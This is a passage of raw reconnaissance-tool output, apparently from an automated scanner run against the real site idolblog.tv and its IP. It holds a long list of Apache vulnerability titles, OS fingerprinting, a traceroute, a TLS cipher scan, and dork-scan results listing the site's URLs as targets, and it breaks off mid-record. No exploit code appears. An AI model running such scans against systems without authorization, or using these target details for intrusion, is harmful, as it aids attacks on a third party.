9152| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
9153| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
9154| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
9155| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
9156| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
9157| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
9158| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
9159| [22459] Apache Geronimo Error Page XSS
9160| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
9161| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
9162| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
9163| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
9164| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
9165| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
9166| [21021] Apache Struts Error Message XSS
9167| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
9168| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
9169| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
9170| [20439] Apache Tomcat Directory Listing Saturation DoS
9171| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
9172| [20285] Apache HTTP Server Log File Control Character Injection
9173| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
9174| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
9175| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
9176| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
9177| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
9178| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
9179| [19821] Apache Tomcat Malformed Post Request Information Disclosure
9180| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
9181| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
9182| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
9183| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
9184| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
9185| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
9186| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
9187| [18233] Apache HTTP Server htdigest user Variable Overfow
9188| [17738] Apache HTTP Server HTTP Request Smuggling
9189| [16586] Apache HTTP Server Win32 GET Overflow DoS
9190| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
9191| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
9192| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
9193| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
9194| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
9195| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
9196| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
9197| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
9198| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
9199| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
9200| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
9201| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
9202| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
9203| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
9204| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
9205| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
9206| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
9207| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
9208| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
9209| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
9210| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
9211| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
9212| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
9213| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
9214| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
9215| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
9216| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
9217| [13304] Apache Tomcat realPath.jsp Path Disclosure
9218| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
9219| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
9220| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
9221| [12848] Apache HTTP Server htdigest realm Variable Overflow
9222| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
9223| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
9224| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
9225| [12557] Apache HTTP Server prefork MPM accept Error DoS
9226| [12233] Apache Tomcat MS-DOS Device Name Request DoS
9227| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
9228| [12231] Apache Tomcat web.xml Arbitrary File Access
9229| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
9230| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
9231| [12178] Apache Jakarta Lucene results.jsp XSS
9232| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
9233| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
9234| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
9235| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
9236| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
9237| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
9238| [10471] Apache Xerces-C++ XML Parser DoS
9239| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
9240| [10068] Apache HTTP Server htpasswd Local Overflow
9241| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
9242| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
9243| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
9244| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
9245| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
9246| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
9247| [9717] Apache HTTP Server mod_cookies Cookie Overflow
9248| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
9249| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
9250| [9714] Apache Authentication Module Threaded MPM DoS
9251| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
9252| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
9253| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
9254| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
9255| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
9256| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
9257| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
9258| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
9259| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
9260| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
9261| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
9262| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
9263| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
9264| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
9265| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
9266| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
9267| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
9268| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
9269| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
9270| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
9271| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
9272| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
9273| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
9274| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
9275| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
9276| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
9277| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
9278| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
9279| [9208] Apache Tomcat .jsp Encoded Newline XSS
9280| [9204] Apache Tomcat ROOT Application XSS
9281| [9203] Apache Tomcat examples Application XSS
9282| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
9283| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
9284| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
9285| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
9286| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
9287| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
9288| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
9289| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
9290| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
9291| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
9292| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
9293| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
9294| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
9295| [7611] Apache HTTP Server mod_alias Local Overflow
9296| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
9297| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
9298| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
9299| [6882] Apache mod_python Malformed Query String Variant DoS
9300| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
9301| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
9302| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
9303| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
9304| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
9305| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
9306| [5526] Apache Tomcat Long .JSP URI Path Disclosure
9307| [5278] Apache Tomcat web.xml Restriction Bypass
9308| [5051] Apache Tomcat Null Character DoS
9309| [4973] Apache Tomcat servlet Mapping XSS
9310| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
9311| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
9312| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
9313| [4568] mod_survey For Apache ENV Tags SQL Injection
9314| [4553] Apache HTTP Server ApacheBench Overflow DoS
9315| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
9316| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
9317| [4383] Apache HTTP Server Socket Race Condition DoS
9318| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
9319| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
9320| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
9321| [4231] Apache Cocoon Error Page Server Path Disclosure
9322| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
9323| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
9324| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
9325| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
9326| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
9327| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
9328| [3322] mod_php for Apache HTTP Server Process Hijack
9329| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
9330| [2885] Apache mod_python Malformed Query String DoS
9331| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
9332| [2733] Apache HTTP Server mod_rewrite Local Overflow
9333| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
9334| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
9335| [2149] Apache::Gallery Privilege Escalation
9336| [2107] Apache HTTP Server mod_ssl Host: Header XSS
9337| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
9338| [1833] Apache HTTP Server Multiple Slash GET Request DoS
9339| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
9340| [872] Apache Tomcat Multiple Default Accounts
9341| [862] Apache HTTP Server SSI Error Page XSS
9342| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
9343| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
9344| [845] Apache Tomcat MSDOS Device XSS
9345| [844] Apache Tomcat Java Servlet Error Page XSS
9346| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
9347| [838] Apache HTTP Server Chunked Encoding Remote Overflow
9348| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
9349| [775] Apache mod_python Module Importing Privilege Function Execution
9350| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
9351| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
9352| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
9353| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
9354| [637] Apache HTTP Server UserDir Directive Username Enumeration
9355| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
9356| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
9357| [562] Apache HTTP Server mod_info /server-info Information Disclosure
9358| [561] Apache Web Servers mod_status /server-status Information Disclosure
9359| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
9360| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
9361| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
9362| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
9363| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
9364| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
9365| [376] Apache Tomcat contextAdmin Arbitrary File Access
9366| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
9367| [222] Apache HTTP Server test-cgi Arbitrary File Access
9368| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
9369| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
9370|_
9371Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
9372Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.18 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
9373No exact OS matches for host (test conditions non-ideal).
9374Network Distance: 10 hops
9375
9376TRACEROUTE (using port 443/tcp)
9377HOP RTT ADDRESS
93781 176.46 ms 10.247.200.1
93792 177.65 ms 213.184.122.97
93803 176.65 ms bzq-82-80-246-9.cablep.bezeqint.net (82.80.246.9)
93814 176.69 ms bzq-179-124-185.cust.bezeqint.net (212.179.124.185)
93825 176.89 ms bzq-179-124-82.cust.bezeqint.net (212.179.124.82)
93836 177.14 ms bzq-219-189-2.cablep.bezeqint.net (62.219.189.2)
93847 231.81 ms bzq-219-189-73.dsl.bezeqint.net (62.219.189.73)
93858 ... 9
938610 239.24 ms 89.248.174.131
9387################################################################################################################################
9388Version: 1.11.13-static
9389OpenSSL 1.0.2-chacha (1.0.2g-dev)
9390
9391Connected to 89.248.174.131
9392
9393Testing SSL server idolblog.tv on port 443 using SNI name idolblog.tv
9394
9395 TLS Fallback SCSV:
9396Server supports TLS Fallback SCSV
9397
9398 TLS renegotiation:
9399Secure session renegotiation supported
9400
9401 TLS Compression:
9402Compression disabled
9403
9404 Heartbleed:
9405TLS 1.2 not vulnerable to heartbleed
9406TLS 1.1 not vulnerable to heartbleed
9407TLS 1.0 not vulnerable to heartbleed
9408
9409 Supported Server Cipher(s):
9410Preferred TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
9411Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
9412Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
9413Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
9414Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
9415Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
9416Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
9417Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
9418Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
9419Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
9420Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
9421Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
9422Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
9423Accepted TLSv1.2 128 bits AES128-GCM-SHA256
9424Accepted TLSv1.2 256 bits AES256-GCM-SHA384
9425Accepted TLSv1.2 128 bits AES128-SHA256
9426Accepted TLSv1.2 256 bits AES256-SHA256
9427Accepted TLSv1.2 128 bits AES128-SHA
9428Accepted TLSv1.2 256 bits AES256-SHA
9429Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
9430Accepted TLSv1.2 256 bits CAMELLIA256-SHA
9431Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
9432Accepted TLSv1.2 128 bits CAMELLIA128-SHA
9433Accepted TLSv1.2 112 bits DES-CBC3-SHA
9434Preferred TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
9435Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
9436Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
9437Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
9438Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
9439Accepted TLSv1.1 128 bits AES128-SHA
9440Accepted TLSv1.1 256 bits AES256-SHA
9441Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
9442Accepted TLSv1.1 256 bits CAMELLIA256-SHA
9443Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
9444Accepted TLSv1.1 128 bits CAMELLIA128-SHA
9445Accepted TLSv1.1 112 bits DES-CBC3-SHA
9446Preferred TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
9447Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
9448Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
9449Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
9450Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
9451Accepted TLSv1.0 128 bits AES128-SHA
9452Accepted TLSv1.0 256 bits AES256-SHA
9453Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
9454Accepted TLSv1.0 256 bits CAMELLIA256-SHA
9455Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
9456Accepted TLSv1.0 128 bits CAMELLIA128-SHA
9457Accepted TLSv1.0 112 bits DES-CBC3-SHA
9458
9459 SSL Certificate:
9460Signature Algorithm: sha256WithRSAEncryption
9461RSA Key Strength: 2048
9462
9463Subject: localhost
9464Issuer: localhost
9465
9466Not valid before: Apr 19 13:55:51 2018 GMT
9467Not valid after: Sep 3 13:55:51 2045 GMT
9468#####################################################################################################################################
9469------------------------------------------------------------------------------------------------------------------------
9470
9471[ ! ] Starting SCANNER INURLBR 2.1 at [20-07-2019 03:54:11]
9472[ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
9473It is the end user's responsibility to obey all applicable local, state and federal laws.
9474Developers assume no liability and are not responsible for any misuse or damage caused by this program
9475
9476[ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/idolblog.tv/output/inurlbr-idolblog.tv ]
9477[ INFO ][ DORK ]::[ site:idolblog.tv ]
9478[ INFO ][ SEARCHING ]:: {
9479[ INFO ][ ENGINE ]::[ GOOGLE - www.google.bj ]
9480
9481[ INFO ][ SEARCHING ]::
9482-[:::]
9483[ INFO ][ ENGINE ]::[ GOOGLE API ]
9484
9485[ INFO ][ SEARCHING ]::
9486-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
9487[ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.as ID: 012347377894689429761:wgkj5jn9ee4 ]
9488
9489[ INFO ][ SEARCHING ]::
9490-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
9491
9492[ INFO ][ TOTAL FOUND VALUES ]:: [ 100 ]
9493
9494
9495 _[ - ]::--------------------------------------------------------------------------------------------------------------
9496|_[ + ] [ 0 / 100 ]-[03:54:33] [ - ]
9497|_[ + ] Target:: [ http://idolblog.tv/ ]
9498|_[ + ] Exploit::
9499|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
9500|_[ + ] More details:: / - / , ISP:
9501|_[ + ] Found:: UNIDENTIFIED
9502
9503 _[ - ]::--------------------------------------------------------------------------------------------------------------
9504|_[ + ] [ 1 / 100 ]-[03:54:35] [ - ]
9505|_[ + ] Target:: [ http://idolblog.tv/teensblog/ ]
9506|_[ + ] Exploit::
9507|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
9508|_[ + ] More details:: / - / , ISP:
9509|_[ + ] Found:: UNIDENTIFIED
9510
9511 _[ - ]::--------------------------------------------------------------------------------------------------------------
9512|_[ + ] [ 2 / 100 ]-[03:54:38] [ - ]
9513|_[ + ] Target:: [ http://idolblog.tv/idols/ ]
9514|_[ + ] Exploit::
9515|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
9516|_[ + ] More details:: / - / , ISP:
9517|_[ + ] Found:: UNIDENTIFIED
9518
9519 _[ - ]::--------------------------------------------------------------------------------------------------------------
9520|_[ + ] [ 3 / 100 ]-[03:54:40] [ - ]
9521|_[ + ] Target:: [ http://idolblog.tv/latinblog/ ]
9522|_[ + ] Exploit::
9523|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
9524|_[ + ] More details:: / - / , ISP:
9525|_[ + ] Found:: UNIDENTIFIED
9526
9527 _[ - ]::--------------------------------------------------------------------------------------------------------------
9528|_[ + ] [ 4 / 100 ]-[03:54:43] [ - ]
9529|_[ + ] Target:: [ http://idolblog.tv/wetblog/ ]
9530|_[ + ] Exploit::
9531|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
9532|_[ + ] More details:: / - / , ISP:
9533|_[ + ] Found:: UNIDENTIFIED
9534
9535 _[ - ]::--------------------------------------------------------------------------------------------------------------
9536|_[ + ] [ 5 / 100 ]-[03:54:46] [ - ]
9537|_[ + ] Target:: [ http://idolblog.tv/__trashed/ ]
9538|_[ + ] Exploit::
9539|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
9540|_[ + ] More details:: / - / , ISP:
9541|_[ + ] Found:: UNIDENTIFIED
9542
9543 _[ - ]::--------------------------------------------------------------------------------------------------------------
9544|_[ + ] [ 6 / 100 ]-[03:54:48] [ - ]
9545|_[ + ] Target:: [ http://idolblog.tv/about/ ]
9546|_[ + ] Exploit::
9547|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
9548|_[ + ] More details:: / - / , ISP:
9549|_[ + ] Found:: UNIDENTIFIED
9550
9551 _[ - ]::--------------------------------------------------------------------------------------------------------------
9552|_[ + ] [ 7 / 100 ]-[03:54:51] [ - ]
9553|_[ + ] Target:: [ http://idolblog.tv/modelblog/ ]
9554|_[ + ] Exploit::
9555|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
9556|_[ + ] More details:: / - / , ISP:
9557|_[ + ] Found:: UNIDENTIFIED
9558
9559 _[ - ]::--------------------------------------------------------------------------------------------------------------
9560|_[ + ] [ 8 / 100 ]-[03:54:54] [ - ]
9561|_[ + ] Target:: [ http://idolblog.tv/sexyblog/ ]
9562|_[ + ] Exploit::
9563|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
9564|_[ + ] More details:: / - / , ISP:
9565|_[ + ] Found:: UNIDENTIFIED
9566
9567 _[ - ]::--------------------------------------------------------------------------------------------------------------
9568|_[ + ] [ 9 / 100 ]-[03:54:56] [ - ]
9569|_[ + ] Target:: [ http://idolblog.tv/websites/ ]
9570|_[ + ] Exploit::
9571|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
9572|_[ + ] More details:: / - / , ISP:
9573|_[ + ] Found:: UNIDENTIFIED
9574
9575 _[ - ]::--------------------------------------------------------------------------------------------------------------
9576|_[ + ] [ 10 / 100 ]-[03:54:59] [ - ]
9577|_[ + ] Target:: [ http://idolblog.tv/page/91/ ]
9578|_[ + ] Exploit::
9579|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
9580|_[ + ] More details:: / - / , ISP:
9581|_[ + ] Found:: UNIDENTIFIED
9582
9583 _[ - ]::--------------------------------------------------------------------------------------------------------------
9584|_[ + ] [ 11 / 100 ]-[03:55:01] [ - ]
9585|_[ + ] Target:: [ http://idolblog.tv/page/67/ ]
9586|_[ + ] Exploit::
9587|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
9588|_[ + ] More details:: / - / , ISP:
9589|_[ + ] Found:: UNIDENTIFIED
9590
9591 _[ - ]::--------------------------------------------------------------------------------------------------------------
9592|_[ + ] [ 12 / 100 ]-[03:55:04] [ - ]
9593|_[ + ] Target:: [ http://idolblog.tv/page/29/ ]
9594|_[ + ] Exploit::
9595|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
9596|_[ + ] More details:: / - / , ISP:
9597|_[ + ] Found:: UNIDENTIFIED
9598
9599 _[ - ]::--------------------------------------------------------------------------------------------------------------
9600|_[ + ] [ 13 / 100 ]-[03:55:06] [ - ]
9601|_[ + ] Target:: [ http://idolblog.tv/page/106/ ]
9602|_[ + ] Exploit::
9603|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
9604|_[ + ] More details:: / - / , ISP:
9605|_[ + ] Found:: UNIDENTIFIED
9606
9607 _[ - ]::--------------------------------------------------------------------------------------------------------------
9608|_[ + ] [ 14 / 100 ]-[03:55:09] [ - ]
9609|_[ + ] Target:: [ http://idolblog.tv/page/55/ ]
9610|_[ + ] Exploit::
9611|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
9612|_[ + ] More details:: / - / , ISP:
9613|_[ + ] Found:: UNIDENTIFIED
9614
9615 _[ - ]::--------------------------------------------------------------------------------------------------------------
9616|_[ + ] [ 15 / 100 ]-[03:55:11] [ - ]
